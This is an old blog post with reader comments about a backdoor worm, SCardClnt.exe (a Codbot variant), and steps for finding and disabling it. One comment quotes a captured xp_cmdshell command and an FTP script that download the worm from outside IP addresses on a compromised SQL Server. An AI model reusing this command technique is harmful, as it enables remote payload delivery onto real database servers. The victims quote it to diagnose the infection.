Wednesday, April 13, 2005

Possible Worm getting around - SCardClnt.exe

Tech Support Guy Forums - help with hjt log please..: "Scardsvr.exe is a legitimate Windows/Microsoft file. SCardClnt.exe isn't.

If the file was missing, then HJT would say so. But it doesn't say '(file missing)' so therefore it MUST be there!

Make sure you can view hidden and system files, as per my original instructions:

Go to: Control Panel > Folder Options > View tab:
Checkmark 'show hidden files'
Uncheck 'hide extensions for known file types'
Uncheck 'Hide protected operating system files'
OK everything and close Folder Options.

Note, those are the WinXP instructions, but I assume it's similar for Win2k ?


Open the 'C:\WinNT\System32' folder
Go to the 'View' menu at the top and select: Arrange Icons by > Type
Now scroll down until you see all the .exe files
Find SCARDCLNT.EXE
Right click it and select 'properties'"

Disable all rights on the 'Security' tab

It may also be installed as a service.

This is a backdoor Worm that is getting around. I am trying to get rid of it now. It spreads via network shares (like how clearcase works). That backdoor payload is a variant of "CODBOT" (Codbot.Z).

4 comments:

Anonymous said...

In my case, it spreads via SQL Server. See a post I sent on a SQL Forum :


Hi,

Since I installed a firewall on my machine, it regularly detects unexpected ftp sessions.

Thanks to a process explorer, I remarked that ftp is launched from a (hidden) cmd.exe, itself lauched by sql.exe (for your info, the ftp command line is : "ftp -n -s:???.txt" where ???.txt is a textfile in \system32\ ).


In SQL Enterprise Manager, I see one suspect process. Process details :

EXEC master..xp_cmdshell 'echo open 81.244.123.174 6220 >> ntp.txt &echo user ntpbxu ntpbxu >> ntp.txt &echo get SCardClnt.exe >> ntp.txt &echo quit >> ntp.txt &ftp -n -s:ntp.txt'


What SQL subsystem is able to launch such a process? a stored procedure? a trigger? (fyi, SQLAgent is not running). How can I prevent this to occur? Do I have to reinstall SQL Server?

Thank you for your help,

François


Note - contents of the textfile in \system32\:

open 81.244.183.229 19470
user itqavjflw itqavjflw
get SCardClnt.exe
quit

Boston Bala said...

Updated virus Information here: SCardClnt.exe: W32/Codbot-Gen

Boston Bala said...

Lost in Media: WORM_RANDEX.BN - Description and solution

Anonymous said...

please help me out here i had the ScardClnt.exe thing, I think i fixed that I am not sure at all, but now i've had some red virus attacks, that my antivirus (trend micro) blocks, but shuts down internet. And now my antivirus isn't operational, it is shut down completely, and when i open it, it doesn't do antything! Also I cant open the task manager nor execute netstat -b, it opens and it closes at the moment. my computer is incredibly slow, i cant open anything, it takes like 5 minutes to open a folder. Do you know what's happening? I post it here because it has something to do with that. Thanks, if you can help me write to happyzaza@hotmail.com . because I don't think this will let me visit this again. HELP!